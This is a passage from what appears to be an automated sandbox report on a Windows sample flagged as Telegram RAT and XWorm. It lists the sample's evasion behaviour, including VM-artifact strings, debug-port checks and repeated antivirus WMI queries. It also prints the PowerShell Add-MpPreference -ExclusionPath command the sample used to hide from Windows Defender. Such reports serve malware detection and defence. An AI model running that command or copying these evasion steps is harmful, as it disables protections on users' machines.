                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: Amcache.hve.13.drBinary or memory string: VMware
                Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088238454.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
                Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088238454.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`
                Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.13.drBinary or memory string: vmci.sys
                Source: Amcache.hve.13.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.13.drBinary or memory string: VMware20,1
                Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000F36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067CA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR
                Yara detected XWorm
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
